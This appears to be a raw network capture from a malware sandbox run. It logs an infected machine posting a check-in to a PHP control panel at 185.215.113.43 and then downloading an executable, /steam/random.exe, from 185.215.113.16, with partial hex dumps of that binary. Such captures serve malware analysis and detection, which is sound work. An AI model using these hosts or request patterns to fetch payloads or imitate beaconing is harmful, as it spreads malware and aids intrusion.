Nov 5, 2024 20:52:45.739306927 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:48.207338095 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 5, 2024 20:52:48.755124092 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 20:52:49.838414907 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 5, 2024 20:52:50.737359047 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 19:52:50 GMT Content-Type: application/octet-stream Content-Length: 2157568 Last-Modified: Tue, 05 Nov 2024 18:57:36 GMT Connection: keep-alive ETag: "672a6aa0-20ec00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 80 73 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 73 00 00 04 00 00 ef 18 21 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng,s@s!@P.d. p.v@.rsrc .@.idata .@ *.@olexbnfi@0Y<@abdjuqmyps @.taggant0s" @
Nov 5, 2024 20:52:50.737379074 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:50.737390995 CET	324	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:50.737401962 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:50.737413883 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 20:52:50.737423897 CET	1236	IN	Data Raw: 5a 0c 92 be ad 44 fc 0d 97 6b 98 f1 b0 d8 7f d7 d0 a1 47 be 40 5f 78 ae 97 9b 7d 3b 7d 08 fe 49 1c a0 f4 92 57 b0 40 1d 40 91 77 3b 38 54 da 0a 40 2c 80 47 38 54 14 f9 3f 2c 80 53 38 55 4e e7 3f 0d f6 3e 0c d8 bd 3f 20 93 75 97 ca b1 9d 7c 94 55 Data Ascii: ZDkG@_x};}IW@@w;8T@,G8T?,S8UN?>? u\|U:<*Lr1;/M\|5{8nF[@Wk)Eb[5AwI'Urb8v_fL#+Q@QJp'H[/l[0S56R\rr\
Nov 5, 2024 20:52:50.737437963 CET	636	IN	Data Raw: bb 9b 40 78 8e ec ec c9 83 a7 b5 ef 22 9e 67 62 7e 49 6c 3f 54 87 9c 20 32 26 d4 3b 2d fe e0 f1 ef 9f e8 90 be c9 20 18 b9 35 cc 9c ac 30 77 c4 b4 02 cb 73 d7 97 20 12 e4 93 ce 2a 0b 2c 7b 3b 46 8c 1a 48 b4 b7 2d 5d bf de 46 cd d0 8e 0f 4b d9 d8 Data Ascii: @x"gb~Il?T 2&;- 50ws ,{;FH-]FK$f'.mmkAi9p)Ci}mZ233Ifq<>$8AM&qI0u?7p/xpZlOo?2aaE_n3FZ~xSIEn=\|0O
Nov 5, 2024 20:52:50.737495899 CET	1236	IN	Data Raw: d8 f5 87 37 c5 d0 a3 33 1d 4c ca 7b a6 e8 02 49 60 b1 4a 50 c4 bc b3 9a de 08 e4 71 3c b9 31 49 35 40 cc 48 bf 38 a2 48 64 a1 18 4c fc d8 ce 42 76 58 79 3f 80 18 00 12 29 fb c5 3c fc 70 79 1b 31 d7 e6 50 b0 b0 0e 72 a4 0c a4 4f 1a 36 79 71 88 f7 Data Ascii: 73L{I`JPq<1I5@H8HdLBvXy?)<py1PrO6yq?$\|HWHk<{S@Xs8PO$(H\7L15qhH\|6y'9T7oKw5`HH#q5R"Q-Weh
Nov 5, 2024 20:52:50.737514019 CET	1236	IN	Data Raw: 3f d8 ca 5b f4 a9 70 3f 77 d8 98 9a d8 99 60 48 a3 a5 77 0b 68 aa 73 0f c6 b1 53 41 8a 59 c0 5f a0 98 8c b8 cc 66 85 f4 de a9 63 fb 49 e0 97 48 f0 14 a7 db db bc 78 3c fc d2 78 8b bd 23 7c eb 67 c3 97 ff c5 0c e4 76 26 bb d7 29 c1 20 79 50 4c a1 Data Ascii: ?[p?w`HwhsSAY_fcIHx<x#\|gv&) yPLPhw:`yql1WReg]#-+wx?D(M7ws^8h0Pth:6ynY8_otQG<>+
Nov 5, 2024 20:52:50.737524033 CET	1236	IN	Data Raw: b6 0d 93 37 23 a9 6f 9b 34 97 44 74 5f d1 87 cf c5 d2 0b 41 9a 9a e7 ef f5 95 1b e8 b4 a9 27 74 81 02 30 a1 63 24 38 49 cd 78 71 eb 77 84 26 39 fc 88 79 33 f0 ce 02 be 06 b8 96 25 d1 ce a9 53 c5 a1 e9 f3 a8 fa 2b 88 e4 31 79 77 b4 01 ee 7a 2c c2 Data Ascii: 7#o4Dt_A't0c$8Ixqw&9y3%S+1ywz,0VTr'm`,o4DhHi!0wXy?T9@y:KM!L0#sCg9$wM7<~n4T,xtboTLEfHW8)
Nov 5, 2024 20:52:50.742573977 CET	1236	IN	Data Raw: bd a7 7b a7 34 ed 22 e7 91 40 c2 3b ff 1c 50 81 3c 3a 61 b4 de df d0 3a e4 e0 6a 50 9c 52 f8 80 c0 47 4a 0b ed 96 af 99 52 9f 52 79 b3 bf e3 13 b7 3f b2 5e 91 78 89 3a a9 e3 6a 3f e4 e4 11 10 c3 27 41 4b af 5d 70 a9 70 f1 e1 12 02 48 7f 5f 02 3e Data Ascii: {4"@;P<:a:jPRGJRRy?^x:j?'AK]ppH_>q'uHvUM~5>`39jur/4Arh/Iw:lc$uc~QgfF9n/M5qk:0[HxbAWRUTJ4xz